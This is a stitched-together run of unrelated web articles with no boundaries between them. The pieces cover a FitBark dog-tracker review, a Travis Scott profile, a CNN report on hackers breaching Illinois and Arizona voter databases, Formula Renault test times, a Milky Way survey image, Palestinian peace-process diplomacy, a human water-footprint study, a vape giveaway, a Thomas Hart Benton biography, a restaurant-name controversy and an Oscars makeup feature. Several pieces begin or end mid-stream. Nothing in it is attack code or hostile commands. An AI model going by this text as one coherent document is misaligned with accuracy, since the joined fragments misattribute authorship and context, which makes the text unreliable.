After downloading the app, you setup an account and sync the device with your smartphone. Once these steps are complete, you are ready to start tracking your dog's activity.
The app shows total calories, health index, sleep score, miles walked, average rest, as well as what the comparable activity levels are for similar dog breeds.
The app works very well and has been designed well from both a functionality and usability perspective. It is easy to navigate and provides a nice array of data.
FitBark: Pros & Cons
Overall the FitBark works extremely well. The app didn't seem to have any issues and was easy to navigate and figure out.
In addition to the app's functionality, the FitBark's battery life lasts up to 14 days. It is very important for wearable devices, regardless if they are for humans or dogs, to have a good battery life. Nobody wants to constantly remember to charge their devices.
The FitBark does require you walk 1 mile with the device for an initial calibration. While this isn't an issue for most dogs, Humphrey does not typically go for long walks.
The FitBark is also waterproof which is nice for when there was slobber everywhere.
Below is a breakdown of the FitBark's positive and negative aspects upon initial review.
FitBark: Final Review
Overall, the FitBark is a great tracking device for dogs. It is interesting to see how much rest the dog gets throughout the day and easy to track why your dog is happy to see you at the end of the day and usually ready for a long walk.
The FitBark can be used for research to compare and contrast similar breeds of animals and test their levels of activity.
The FitBark also helps motivate increased exercise through longer, or more frequent, walks.
We hope you enjoyed our FitBark review and that it proved helpful in your search for the perfect pet-wearable. Stay tuned for more.
Sign up for the most recent Internet of Things (IoT) news, product updates, case studies, and more.
Your Email (required)
“Chaos, rage, blood, sweat, tears — and happiness and love. No bad vibes at all.” This is what Travis Scott had told me he expects from his live shows as we sat in a Chevy Suburban before a recent show, and the crowd later at the Fonda Theatre in Los Angeles did not disappoint. Shoes flew through the air, bodies surfed through the crowd, and an almost hysterical sense of anticipation coursed through the building. In the eye of the storm was Scott, standing in fog, amid an Old West stage set, as a sold-out crowd chanted, “Travis! Travis!”
Scott's trusted right hand, DJ Chase B, emphatically belted: “L.A.! Welcome to the Rodeo!”
The cowboy ethos runs deep for the Houston native. He named his major-label debut album Rodeo, and his stage set employs the imagery of Westerns. To hear him tell it, his concerts are one part punk-rock basement show and one part saloon shootout: “We like motherfuckin' broncos,” he said. “We never rehearse. We go and see what the kids are here for, what they're vibing to, and then we play it out from there … that's how we know.”
It's all happened quickly for Scott, whose story bears a striking resemblance to that of his mentor, Kanye West: Scott, too, is a college dropout with frantic ambition.
With a drive seemingly tailored to the musical moment, Scott has come of age in a world where artists craft their personas online and are often as responsible for their images as they are for their music. Scott's knack for layered production has given his songs an ethereal, almost gothic feel, while his sinister wordplay and ability to mask dark tones with vocal manipulation has prompted West to, according to Scott, charge him with “carry[ing] the music through time.”
Scott's story is one of hard work and serendipity. He has often found himself in the right place at the right time, but he usually had to work hard to get to those places. It's a new world for the ex–University of Texas student, who went from a couch-surfing, phone-less, self-proclaimed savant looking for his sound to a renowned producer and rapper working with T.I., West, and Jay-Z. He had to hustle just to get the chance. According to Scott, he facilitated the transition from student to full-time musician using the money his parents sent him for tuition and books to fund his budding career.
He came to T.I.'s attention after Scott released the eye-popping video for “Lights (Love Sick).” A studio session ensued, and a track of T.I. freestyling over Scott's self-produced “Animal” was eventually released.
He inked a deal with West's production team, eventually landing “Sin City” on the 2012 G.O.O.D. Music compilation album, Cruel Summer.
But despite these famed associations, it was working with Jay-Z that Scott identified as a turning point in his career. With his self-described “golden ear,” Scott stumbled upon Wondagurl's production for the song that would become “Crown,” which landed on Jay's commercially successful but critically maligned Magna Carta Holy Grail.
“[Working with Jay-Z] showed me how to make an album,” Scott said. “It showed me how to do music, how to sit in the studio, how to move.”
His mentors also taught him that sound and vision were equally important. For Scott, image is everything. As his music has changed, so has the related imagery. You can see the difference between his “Lights (Love Sick)” video and the dark, fantastical, into-the-woods clip from Owl Pharaoh's “Upper Echelon.”
“When that ‘Love Sick' video came out, I was just [a] young [kid] from Houston,” Scott said. “And I was gravitating toward a certain culture. Looking back, I probably wouldn't have done it like that. I think of Westernized culture as a good visual for my music.”
According to Scott, he found the connection between his sound and Wild West imagery on the mixtape Days Before Rodeo, the precursor to his debut. He cited Nabil Elderkin, a longtime West collaborator, as well as a few iconic and unlikely filmmakers for influencing the experience.
“Robert Rodriguez, Quentin Tarantino are definitely some of [my] the biggest inspirations,” he said. “John Hughes, too. I fuck with the pop culture vibe he brought to the table. He set it up for black kids.”
Scott's quick rise has raised critics' eyebrows — he's been called a biter, a tasteful thief, and much worse by someone who claims to be former associate. He has been accused of stealing songs and faced allegations of sexual assault. Scott has vehemently dismissed the claims of theft. When I asked him about the sexual assault allegations, he described them as “some stupid shit, really,” and quickly moved on.
Although Scott has grown as an artist, his personal life remains a question mark. He's elusive and vague, but surprisingly upbeat.
“I feel like I finally broke out of the mold,” said Scott. “Just finally knowing myself and finding myself.”
Instagram
At the Fonda, Scott turned his back on the crowd and faced the screen behind him on stage. Then he walked to the front corner and dapped up NBA All-Star James Harden and fellow G.O.O.D. music artist Big Sean, who excitedly bounced as Scott's single “Antidote” began to play. Scott was conducting his show as if it were a status check on a Houston-based shuttle set for liftoff. Or a bull at the gate of a bucking chute.
“Five … bounce … four … bounce … three … bounce … two … bounce … YEEEE-AH!”
He and Big Sean threw themselves off the stage, leaping into the crowd as Scott's catchy hook rippled through the venue. Harden rapped every single syllable.
With the celebrity mentors, celebrity fans, celebrity (maybe) girlfriend, and the very now sound, this is Scott's moment. But he wanted to talk about only the future.
“Rodeo is one of the first steps of getting to that vision,” he said in the Suburban. “We've still got a billion more steps to go. But we're getting close.”
Tate Frazier (@tfrazii07) is a Grantland intern.
Washington (CNN) Hackers have breached databases for election systems in Illinois and Arizona, according to state election and law enforcement officials.
In Illinois, hackers accessed a database for the Illinois Board of Elections, compromising up to 200,000 personal voter records according to Ken Menzel, General Counsel for the board.
The FBI is investigating the hack, which initially occurred in late June and was discovered in July. It was first reported by Yahoo . Officials with the Board of Elections are "highly confident they (the hackers) weren't able to change anything, although the investigation is still going on" according to Menzel.
Investigators believe the hackers are likely based overseas, according to a law enforcement official.
The Illinois database included voters' names, addresses, sex and birthdays in addition to other information. Some of the records include either last four digits of a voter's social security number or drivers' license numbers. The database is comprised of records for 15 million individuals and is 10 years old. Not all outdated information has been purged, according to Menzel, so some of those records likely include information for deceased voters or those who have subsequently moved.
According to Matthew Roberts, director of communications for the Arizona secretary of state, in late May, Arizona officials took the statewide voting registration system offline after the FBI alerted the Arizona Department of Administration that there was a credible cyber threat to the voter registration system.
Although The Washington Post reported that Roberts attributed the database breach directly to a Russian hacker, when pressed by CNN, he said that the Arizona secretary of state's office learned of Russian involvement from internal IT and cybersecurity staff. "We indirectly heard that the credential and username posted online was from a known Russian hacker," Roberts said.
When they took the system offline to review any vulnerabilities, they discovered that a county election official's username and password had been posted online publicly. It's believed that a worker may have inadvertently downloaded a virus which exposed the username and password. In this instance, the username and password information posted would only give individuals access to a localized, county version of the voting registration system, and not the entire state-wide system.
Roberts says there is no evidence that any data within the system was compromised and there was no evidence of malware present in the database.
The breaches are causing concern among election officials because of the voter personal information that could have been stolen, not because of any fear that an election could be stolen, law enforcement officials say.
States have a variety of systems -- some better than others -- but the voting machines and tabulating systems are generally not connected to the Internet, which would be the vulnerability hackers would use to compromise the electoral system.
The Department of Homeland Security is unaware of any specific credible threat to the electoral systems, according to a law enforcement official.
Election databases are attractive targets to hackers because they contain personal information that can be cobbled together with other data to help criminals steal money.
DHS has offered to help states increase security of their systems, but states have rebuffed federal help and largely believe their systems are secure. DHS Secretary Jeh Johnson held a conference call recently to discuss whether DHS should declare electoral systems as critical infrastructure , which triggers more involvement from the federal government. States have resisted those moves.
Asked about the intrusions while speaking at the Symantec Government Symposium in Washington, FBI Director James Comey said Tuesday he didn't want to comment on a specific case but said the bureau is always looking at ways to counteract cyberattacks.
"We take very seriously any effort by any actor -- including nation states, especially nation states that move beyond the collection of information about our country and offers the prospect of an effort to influence the conduct of affairs in our country -- whether it is an election or something else," Comey said.
Illinois officials say it's been a challenge to identify everyone whose records were compromised as they have to sort through the 109 jurisdictions that may have been affected. According to Menzel, they are working with the FBI and other law enforcement agencies to figure out who was responsible.
Menzel says the board is not concerned about the integrity of the voting system and does not expect the breach to impact the upcoming general election.
Illinois voting machines are not connected to the internet in any way, according to Menzel. Most voters in Illinois use an optical scan ballot but some jurisdictions do have touch screen machines to comply with Americans with Disabilities Act regulations. In some large counties, such as Cook County, at the end of the voting day, early unofficial voting results are reported back and sent via cell phone signal but they have encryption protection. Arizona largely uses paper ballots and also has touch screen machines.
Josef Kaufmann Racing duo Jehan Daruvala and Lando Norris led the way on the first day of the second Eurocup Formula Renault pre-season test at Paul Ricard.
With the circuit shared with Euroformula Open, the day's running was split into four sessions.
Ex-Formula 3 driver Dorian Boccolacci was ahead for Tech 1 Racing in the first session before Norris lowered the benchmark in the second.
AVF's Darius Oskoui topped session three, where times were slower after a mid-day rain shower, before Force India protege Daruvala set a new benchmark in improved conditions in the final hour.
The entire field set its best times in the final session, with Norris 0.031s slower than his team-mate's 2m03.641s lap.
After dominating the recent Aragon test, Max Defourny was third for R-ace GP, followed by lead Fortec driver Vasily Romanov and AVF's Harrison Scott.
Gabriel Aubry was the second best rookie behind Norris with sixth overall ahead of team-mate Boccolacci. Will Palmer (R-ace GP), Hugo de Sadeleer (Tech 1) and Nikita Troitskiy (Fortec) rounded out the top 10.
All 25 drivers that tested at Aragon were in action, joined by newcomers Finlay Hutchison and Ghislain Cordeel under the Hutchinson Racing and GMMA Formula Racing banners respectively, both having also taken part in the Paul Ricard test in November.
Scottish karting graduate Hutchison had a deal to race for Mark Burdett Motorsport in the NEC this season confirmed on Thursday.
Combined results
Pos Driver Team Time Gap Laps 1 Jehan Daruvala Josef Kaufmann Racing 2:03.641 48 2 Lando Norris Josef Kaufmann Racing 2:03.672 0.031 47 3 Max Defourny R-ace GP 2:03.878 0.237 64 4 Vasily Romanov Fortec Motorsports 2:04.038 0.397 59 5 Harrison Scott AVF 2:04.043 0.402 59 6 Gabriel Aubry Tech 1 Racing 2:04.294 0.653 51 7 Dorian Boccolacci Tech 1 Racing 2:04.296 0.655 54 8 Will Palmer R-ace GP 2:04.318 0.677 79 9 Hugo de Sadeleer Tech 1 Racing 2:04.381 0.740 56 10 Nikita Troitskiy Fortec Motorsports 2:04.435 0.794 48 11 Sacha Fenestraz Tech 1 Racing 2:04.491 0.850 50 12 Julien Falchero R-ace GP 2:04.504 0.863 53 13 Alexey Korneev JD Motorsports 2:04.577 0.936 57 14 Alex Perullo Technorace 2:04.684 1.043 63 15 Bruno Baptista Fortec Motorsports 2:04.744 1.103 61 16 Robert Shwartzman Josef Kaufmann Racing 2:04.882 1.241 65 17 James Allen JD Motorsports 2:04.891 1.250 45 18 Ferdinand Habsburg Fortec Motorsports 2:05.195 1.554 27 19 Henrique Chaves AVF 2:05.205 1.564 62 20 Darius Oskoui AVF 2:05.213 1.572 50 21 Ghislain Cordeel GMMA Formula Racing 2:06.049 2.408 64 22 David Porcelli MGR Motorsport 2:06.235 2.594 68 23 Nerses Isaakyan AVF 2:06.235 2.594 61 24 Rodrigo Pflucker Cram Motorsport 2:06.598 2.957 62 25 Finlay Hutchison Hutchison Racing 2:08.056 4.415 47 26 David Richert Cram Motorsport 2:08.571 4.930 77 27 Julia Pankiewicz AVF 2:13.836 10.195 21
From a rocky mountain at the heart of Chile's Atacama desert, scientists used the Visible and Infrared Survey Telescope for Astronomy‘s (VISTA) massive 4.1 meter-wide mirror to capture the above image of the central Milky Way galaxy, pinpointing more than 84 million stars in the most detailed survey of its type.
The image, captured by looking at the infrared light streaming from the heart of our home galaxy, says the European Southern Observatory, “would be 9 metres long and 7 metres tall” if printed out at a typical print resolution. Or, in way more fun terms, if printed as a carpet, this gorgeous view could cover the floor of a 675-square foot apartment.
As Skymania‘s Paul Sutherland points out, there was of course a scientific purpose to putting together this whopping nine-gigapixel image.
Cataloguing the many millions of stars in this one small central region of the Milky Way will help scientists understand more clearly what lies at the centre of our galaxy and how it developed. Chile's Roberto Saito, who led the study, said: “By observing in detail the myriads of stars surrounding the centre of the Milky Way we can learn a lot more about the formation and evolution of not only our galaxy, but also spiral galaxies in general.”
That, and it's really, really pretty.
More from Smithsonian.com:
Gigapixel Camera Takes 11-Foot Wide Photos in 0.01 Seconds
When Galaxies Collide: The Fate of the Milky Way
RAMALLAH, West Bank — As an alternative to US sponsorship, the Palestinian Authority (PA) is looking to recruit an international coalition to guide the peace process with Israel. The PA no longer considers the United States a reliable negotiator in light of US President Donald Trump's recognition of Jerusalem as the capital of Israel.
On Dec. 19, Palestinian President Mahmoud Abbas sent delegations to Russia and China to discuss the possibility of those countries taking an active role in the peace process. Abbas adviser Nabil Shaath spoke Dec. 20 with Al-Monitor by phone after arriving in Beijing. He had just visited Moscow "as part of our delegation's mission to search for new sponsors for the peace process," he said.
Speaking about the outcome of his meeting with Russian Foreign Minister Sergey Lavrov, Shaath said, “We have informed Russia of our decision to reject the US monopoly on the peace process, and if Russia, China and some European countries want to find an international framework for the peace process, we are fully prepared to deal with it. And Russia expressed its readiness to play this role.”
Haaretz reported Dec. 18 that the Palestinian delegation's visit to Beijing was to coincide with that of an Israeli delegation following an invitation by the Chinese Foreign Ministry. According to Haaretz, this falls under Beijing's policy to strengthen its role in the Middle East and the Israeli-Palestinian conflict.
Shaath noted, “China wants to show the Palestinian and Israeli delegations that it is ready to take over the peace process, and we do want it to play a role in sponsoring the peace process alongside other international parties.”
When asked what the PA wants this international sponsorship to look like, Shaath said it could be similar to the platform used by the six world powers — the United States, China, Russia, Britain, France and Germany — to reach the nuclear agreement with Iran. “The most important thing for us here is to no longer have a US monopoly over the peace process," he added.
Abbas met Dec. 22 with French President Emmanuel Macron in Paris to see whether France is likely to have a role in the peace process.
Abbas said at a press conference there, “The United States is no longer an honest mediator in the peace process, and we will not accept any US plan because of its bias and violation of international law." Macron reiterated his support for a two-state solution and said France will work to facilitate negotiations, but he added that it would be premature to give up on the current peace initiatives.
Mohammad Shtayyeh, a member of the Fatah Central Committee, said in a Dec. 20 interview with Russia Today that Abbas “wants to create a coalition to end the occupation, hence his meeting with President Macron — and he will meet with European foreign ministers in mid-January.”
The Palestinian leadership, he added, would prefer to hold a UN-sponsored international conference on the peace process in Moscow with the participation of Russia, China and European countries, in accordance with what was agreed upon at the 2007 Annapolis Conference on the peace process.
The PA, in addition to presenting its proposal to a number of world powers, deployed major efforts in UN institutions to gain support.
In a Dec. 21 speech before the UN General Assembly, Palestinian Foreign Minister Riyad al-Maliki said, “The peace process is not a matter of monopoly, and the Palestinian cause is the responsibility of the international community as a whole, including the UN.” That same day, the General Assembly officially rejected Trump's decision on Jerusalem.
Meanwhile, the PA's rejection of the United States as a sponsor of the peace process and Abbas' search for an international one is a knockout blow for the so-called deal of the century that the United States intended to put forward to resolve the Palestinian-Israeli conflict.
“The US sponsorship of the peace process must end, and it should not be given the opportunity to make any proposals and suggest ideas for the peace process,” Abbas' presidential adviser for diplomatic affairs, Majdi al-Khalidi, told Al-Monitor.
As the PA searches for international sponsorship, it will intensify its work to gain international recognition.
Khalidi noted, “It is necessary for the state of Palestine to obtain recognition all around the world so that the peace process is based on equal grounds between two recognized states.”
Political author and former spokesman for the Palestinian government, Ghassan Khatib, told Al-Monitor that international support will help the PA, but it can only go so far without Israel's cooperation.
“I do not personally think the PA's efforts can work because Israel will not accept sponsorship other than the United States, which will employ all means to impede these attempts." Yet, Khatib said, “if the PA fails to find an international alternative, it must continue to reject US sponsorship to spare the Palestinian cause more damage."
He said an international coalition would "respect and abide by international law and resolutions on the Palestinian cause, unlike the US sponsorship."
Regarding the PA's ability to withstand possible US economic sanctions, Khatib said, “I don't expect the United States to impose economic sanctions on the PA, especially since its economic aid goes in two directions — the bulk goes to the Palestinian security services and the other part to the Palestinian private sector.” Meanwhile, the US decision to cut aid to the PA in early December is related to the funds it provides to the public budget.
“It is difficult for Washington to stop supporting the Palestinian security services," which work with Israel to counter unrest and violence. "But even if [the United States] does so, the PA can handle it. In any case, stopping all economic aid would be less dangerous and damaging than agreeing to continue with the US sponsorship of the peace process," he added.
The PA's rejection of any US sponsorship of the peace process is the first of its kind in the 24 years that followed the Oslo Accord. This means that the process will be stepping into new territory. The PA can either succeed in mobilizing international support or end up freezing the peace process until it finds a new sponsor; otherwise, it will have to succumb to pressure and resort to the United States once again.
Image copyright Fernando Jaramillo Image caption The Mekong is one of the rivers showing the highest increases in evapotranspiration
New calculations show that our already sizeable water footprint is 18% bigger than we thought.
The study is based on a century's worth of observational data drawn from 100 river basins across the world.
It reveals a significant increase in the water being "lost" to the atmosphere as a direct result of human activity.
This occurs through evaporation from land and water surfaces, and from plants as they transpire.
Based on data
The old estimates of human water consumption add up to a staggering number: 9,100 cubic km per year. This volume is about twice the size of Lake Michigan in the US.
Fernando Jaramillo and Georgia Destouni from Stockholm University in Sweden have now used freely available data to update these assessments, to reveal a more precise picture of how much humans are impacting the natural water cycle at the global scale.
Their research suggests human water management strategies are responsible for an additional quantity of water the size of Lake Ontario being transferred to the atmosphere - a significant element of consumption that the earlier approaches had underestimated. It means the human water footprint is actually closer to 10,700 cu km a year.
"Previous assessments of human water consumption were mainly based on national statistics and global scale models. The novelty of this study is that it's based on data," Dr Jaramillo emphasized.
The team has published its work in Science magazine. A presentation was also made this week to the Fall Meeting of the American Geophysical Union - the world's largest annual gathering of Earth scientists.
Evaporation and transpiration
Image copyright Fernando Jaramillo Image caption The irrigation techniques used in agriculture drive more water into the atmosphere
The authors explained that water consumption by humans goes beyond drinking water, industrial water, and water for municipalities.
Water that would normally be in rivers but ends up being in the atmosphere as vapour due to human activity has been largely overlooked, and this is what the authors focused on.
"The loss is from the landscape through the atmosphere and that leaves less water for both humans and other ecosystems in the landscape", Prof Destouni explained.
This displacement of water into the atmosphere occurs through water evaporation or through transpiration by plants. So the total flow of water to the atmosphere is given by evapotranspiration.
"We used a simple water budget: water lost by evapotranspiration is precipitation minus water runoff," Dr Jaramillo answered when asked how they used the data.
The footprint
Looking at their data, the scientists could see an increase in evapotranspiration when comparing the first and second halves of the last century.
The question they then asked was how much of this change was being driven by human activity.
They found that areas previously identified as having experienced the ecological consequences of dams and irrigation also showed the biggest increase in evapotranspiration.
"Dam and irrigation developments - even though local - have a big global impact on human water consumption. That's what has not been calculated before and what we've estimated in this paper," Prof Destouni said.
"The water footprint could be up to 20% larger than previously estimated," Dr Jaramillo revealed.
"In dry areas, reducing the water in the environment can have an enormous impact on humans and ecosystems. In a wet landscape, it is in relative terms not as big in the direr areas. Central Asia (Aral Sea), Middle East, areas around the Mediterranean - these are examples of most vulnerable."
Irrigation, dams, and ground water
Image copyright Fernando Jaramillo Image caption The large water surface area created by a dam causes more evaporation
Dr Jaramillo explained how human water management leads to more evapotranspiration.
"With irrigation, we are moving water from one place to another - and part of this water will simply evaporate from the ground surface. These crops in order to grow, they take this water in and by respiration they send this water to the atmosphere.
"When you build a dam and make a reservoir, you're also consuming a lot of water. The water surface you create causes more evaporation; otherwise that water would be running on a river.
"Also if you increase the level of the water by say 90m, the groundwater on the hillsides will also increase by 90m. A lot of plants now have access to water that previously wasn't there. Those plants will also transpire more water."
Prof Destouni explained how evapotranspiration induced by human activity is linked to climate change and weather: "The atmosphere is warmer due to global warming and warmer air can hold more water vapour."
Transport of moisture in the atmosphere is also changed: "There is more vapour coming from the land rather than the sea. You get the effect that it rains more in other places.
"If we don't understand how transfer of water and water vapour happens, we will misinterpret things and then our measures for mitigating climate change or adapting to climate change will not be effective."
Uncertainty lingers
"In some regions, we just open the tap and water comes out. We don't think about it. How much water are we consuming?" Dr Jaramillo said, highlighting the worldwide uncertainty regarding the numbers on human water consumption.
"Our lack of knowledge is gigantic. We're lagging so much on studies on the water cycle and water consumption.
"It is serious that at this point in time people did not use all the data that was available to actually calculate this change. People continued to make estimates using old data," Prof Destouni commented.
The Stockholm University scientist emphasized the importance of using this openly accessible data to "continue to measure these kinds of things so that we can actually see these changes happening".
Eleaf Ijust 2 Mini Sub Ohm Kit - PERFECT AS A BACKUP OR A STARTER ECIG!
Say thanks to our sponsor the best way you can - click here and visit their site! Visiting them comes back to you as more giveaways!
Say thanks to our sponsor the best way you can - click here and visit their site! Visiting them comes back to you as more giveaways!
Say thanks to our sponsor the best way you can - click here and visit their site! Visiting them comes back to you as more giveaways!
Say thanks to our sponsor the best way you can - click here and visit their site! Visiting them comes back to you as more giveaways!
Say thanks to our sponsor the best way you can - click here and visit their site! Visiting them comes back to you as more giveaways!
The lovely folks at European Vaping Supplies are back with yet another great giveaway. This time it's thefrom Eleaf, one of the pioneering brands on the planet!, so make sure you enter the giveaway.. The quality finish and performance of the original iJust 2 has been carried over, but the size has shrunk considerably.. The Eleaf iJust 2 Mini is an excellent electronic cigarette that combines affordability with a trusted brand name.→ 1100mAh battery with direct output voltage→ 22mm diameter | 61mm length→ Spring loaded, brass 510 contact pin→ Single-button operation• LED light around the button to indicate battery life→ Made from stainless steel→ Numerous protection systems• Atomizer protection• Short circuit protection• No atomizer protection• Low voltage protection→ Micro USB port with fast 1A charging rate→ 22mm diameter | 57.5mm length | 2ml capacity→ Four-hole adjustable airflow (each hole 2mm x 6mm)→ EC atomizer head with vertical coil structure• Pure organic cotton wicks• 0.3Ω (30W - 80W)→ 6mm stainless steel drip tip→ Specially designed to dissipate heat→ Made from stainless steel and tempered Pyrex glass
Home / Browse / Benton, Thomas Hart
Thomas Hart Benton (1889–1975)
Thomas Hart Benton—painter, muralist, and writer from Missouri—developed, along with artists Grant Wood and John Steuart Curry, a style of painting in the 1920s that became known as regionalism. Benton was influenced early in his career by a sketching trip he took through northwest Arkansas in 1926. He returned to Arkansas to sketch and paint periodically, primarily in the Buffalo River area. Benton also enjoyed floating and fishing on the Buffalo River and opposed efforts to dam it during the 1960s.
Tom Benton was born on April 15, 1889, in Neosho, Missouri. He was the oldest of four children born to Maecenus Eason (M. E.) and Elizabeth (Wise) Benton. M. E. was a lawyer and served as a congressman from 1897 until 1905. Benton was named for M. E.'s grand uncle, Missouri senator Thomas Hart Benton.
Benton began to have interest in art as a boy. He attended high school in Neosho in 1905–06, but he quit when he got a job drawing cartoons at The Joplin American newspaper. His father persuaded him to attend the Western Military Academy in Alton, Illinois, in 1906, but he dropped out in February 1907 and transferred to the Art Institute of Chicago. He left the institute and continued his artistic studies at the Académie Julien in Paris from 1908 to 1911. While his mother encouraged his artistic endeavors, his father did not.
Benton moved to New York City in 1912, where he struggled to make a living as an artist. During World War I, he served at a naval base in Norfolk, Virginia. To make money, Benton painted movie sets and taught at the Chelsea Neighborhood Association, in public schools, and at the Art Students League in New York. He married Rita Piacenza on February 19, 1922. An Italian immigrant and former student, she took an active role in Benton's career, handling all of his business affairs so he could focus on art. The two remained married until his death.
In the early part of his career, Benton attempted to master several different styles of painting, including impressionism, pointillism, synchromism, and cubism. Though he achieved some success, he was largely unsatisfied with his efforts.
In 1924, Benton returned to Missouri to help care for his father, who was dying of cancer in a hospital in Springfield. The experience of reconciling with his estranged father and listening to old friends who came to visit at the hospital stirred up a longing to reconnect with his rural upbringing and to see the backwoods of America. Benton's father died on April 27, 1924. Benton returned to New York, but he became increasingly disillusioned with the art scene there. He decided to travel around the country to capture the daily life of Americans at work and play.
His first sketching trip lasted for two months and began in the spring of 1926. Benton took a train from New York to New Orleans, then went north by towboat on the Mississippi River. He got off at Helena (Phillips County) and took a train to Little Rock (Pulaski County). He continued north from Little Rock, hiking fifteen to twenty miles per day, until he reached the Buffalo River area. Rambling about the backwoods of Newton County, Benton experienced a lifestyle largely unchanged since the 1890s. He sketched farmers working in their fields, church meetings, boys swimming, children in schoolhouses, and life around the town square. Benton stayed at the homes of farmers and backwoods hotels, including the Whiteley Hotel at Ponca (Newton County), and later wrote an article about his experiences for the July 1934 issue of Travel magazine.
This trip, the first of many similar journeys throughout the United States, was significant in the development of Benton's artistic style. He sought to capture the American experience in a manner that made his art accessible to the mainstream public, an approach that put him at odds with other artists and critics. A number of lithographs and paintings resulted from this trip. His work was derided by some as cartoon-like, isolationist, jingoistic, and stereotypical. Others felt Benton's work was original and full of energy. In 1934, Benton received acclaim when he was pictured in a self-portrait on the cover of Time magazine and in an associated article about the development of regionalism.
Some of his most famous works include Boomtown (1928), which captured a small town in Texas buoyed by an oil strike; Persephone (1939), a large nude; Prodigal Son (1943), a Depression-era scene of a man returning to his home, only to find it in ruins; and Hollywood (1937), which captured the film industry. His mural A Social History of the State of Missouri in the State Capitol was controversial for its inclusion of an infamous Kansas City mob boss and a lynching. He angered others by his inclusion of a coal miner's strike and images of the Ku Klux Klan in another mural, A Social History of the State of Indiana. When critics called his murals “loud and disturbing,” Benton defended his methods by noting, “They represent the U.S. which is also loud and not in ‘good taste.'”
In 1935, Benton moved to Kansas City, where he joined the faculty of the Kansas City Art Institute (KCAI). He served on the faculty until 1941 and lived in Kansas City for the rest of his life. Benton's most famous student was Jackson Pollock, who went on to emerge as a leader in the abstract expressionist movement and became known for his drip paintings.
In the late summer of 1939, Benton took his son Thomas Piacenza (T. P.) to Arkansas for two short vacations. The pair spent time floating and fishing the White and Buffalo rivers. Benton also sketched and painted the scenery there, resulting in the lithograph Down The River, which featured his son. Another product of these trips was a painting and lithograph of a White River scene, Shallow Creek.
Benton returned in the spring of 1940 with a group of his advanced students from KCAI. They spent about ten days sketching and painting in Newton County, near Jasper. The following year, Benton returned with yet another group of students.
It was about this time that Benton became acquainted with various Arkansas artists and writers. He met poet John Gould Fletcher, who introduced Benton to the artist Adrian Brewer in 1938. Benton knew artists Louis and Elsie Freund and was a periodic visitor at their home in Eureka Springs (Carroll County). He also knew Ozark writer Vance Randolph and illustrated some of his work.
Starting about 1965, Benton made annual trips to float the Buffalo River with a group of friends from Kansas City. Sometimes he fished or swam, but invariably he carried a sketch pad with him. He painted some of his best late works during this period, including The Chute-Buffalo River (1970) and Jon-Boat (1973). Benton also opposed damming the Buffalo River and wrote a letter to the Corps of Engineers to that effect. A short film, A Man and a River, which was produced under the auspices of the U.S. Environmental Protection Agency, was made about a Buffalo River trip that Benton made in 1973. The film was later shown at the park.
In 1974, Benton took on the job of painting a large mural on the history of country music for the Country Music Foundation in Nashville, Tennessee. The mural, which was titled The Sources of Country Music, intended to show the origins of a music that Benton loved. On January 19, 1975, Benton completed the mural. After dinner he went out to sign the painting. It was a bitterly cold night, and he had a heart attack and died in his studio in Kansas City. Benton's ashes were buried beneath a tree on the property where he and his wife would summer on Martha's Vineyard.
His paintings, drawings, and lithographs, many of which are of Arkansas scenes, are highly prized by museums and private collectors. Practically all major American museums have at least one Benton painting, including the Metropolitan Museum of Art, Whitney Museum, Dallas Museum of Art, and the Nelson-Atkins Museum of Art. His large paintings have been known to sell for more than $500,000, while prints often run from $1,000 to $10,000.
For additional information:
Adams, Henry. Thomas Hart Benton: An American Original. New York: Alfred A. Knopf, Inc., 1989.
Benton, Thomas Hart. “America's Yesterday: In The Ozark Mountains of Arkansas—Life and Customs on a Forgotten Frontier.” Travel 63 (July 1934).
———. An Artist In America. 4th ed. Columbia: University of Missouri Press, 1983
W. Russ Aikman
University of Texas at Arlington
EASTPOINTE, Mich., Feb. 4 (UPI) -- A Syrian couple has opened a Middle Eastern restaurant called "The Bomb" in Eastpointe outside Detroit that has some people ready to explode with indignation.
George and Rana Kasar thought the name might help draw customers to their business, but dishes like “The Bomb Fajita” might end up having the opposite effect.
“It's his idea, my husband's idea,” Rana told WWJ Newsradio. “I said, ‘No! It's too much!' He's like, ‘No, no, no. I think it's going to be perfect.' Something like, when they eat something they're like, ‘Wow! It's the bomb.'”
The Bomb will also serve certain American foods. “(It's) a little bit scary. They think we're terrorists now,” Rana said.
"I think it's distasteful. I think it feeds into the certain stereotypes that are out there, that somehow someway associate Arab Americans with bombs, destructive devices or some sort of violence. I would urge them really to reconsider at a different name, using a name that may be hurtful to a certain community," said Nabih Ayad, from the Arab American Civil Rights League.
Some people took to social media to voice their displeasure about the play on words.
“That does seem like a really ill-conceived name for a middle eastern restaurant. Unless they want to be on DHS watch lists,” one woman posted on Facebook.
“It's a problem only if either they 1. add an -er to the end, 2. deliver in a van with their company name on it,” wrote someone else.
New middle eastern cuisine fast food restaurant called "The Bomb" opens in Detroit. This is not a joke. But it's kinda funny. — Dan Schneider (@DanVideo47) February 4, 2014 Nice Urban Dictionary attribution. RT @FoxNews: Syrian couple opens Detroit eatery called The Bomb http://t.co/JtbnpS2jCc — Mike Tunison (@xmasape) February 4, 2014
[WWJ] [My Fox Detroit]
With voting open for this year's Oscars, we're taking a closer look at some of the craftspeople nominated for the year's best films—from the people who re-created the golden age of Hollywood for the Coen Brothers to the makeup artist who redefined a pop-culture icon. Check VanityFair.com every day this week for another close-up look at 2017's Oscar nominees.
In 2015, Warner Bros. hired makeup artist Alessandro Bertolazzi for the most intimidating challenge of his three-decade career: making over the Joker, a pop culture icon, for Suicide Squad. Granted, the supervillain (played this time by Jared Leto) did not get as much screen time as the film's titular team. But as the most-famous character featured in Suicide Squad, the 67-year-old, green-haired villain, who has appeared in thousands of comic books and been famously portrayed onscreen by Jack Nicholson and Heath Ledger, was the speculative fixation of many comic fans. (Bertolazzi was startled to discover that the Internet was already guessing how his Suicide Squad Joker would look before he started work on the film.) So, how did Bertolazzi prep for the much-anticipated makeover?
By starting from zero.
“Warner Bros. gave me all the comics to read,” explained Bertolazzi, who is nominated for an Oscar this month. “That didn't help, because the character was too iconic, and looking through all the different looks would have been too complicated. They had already made an amazing, beautiful Joker before me [in The Dark Knight.] And now I had to create something that was different from the previous Jokers, but [incorporated] the rules and paid respect to the iconic Joker.”
Bertolazzi looked to director David Ayer for guidance, asking him, “Who is this guy in Suicide Squad? What is his story?” Ayer's take: “He's a poet. He's in love—sick love, but still love.”
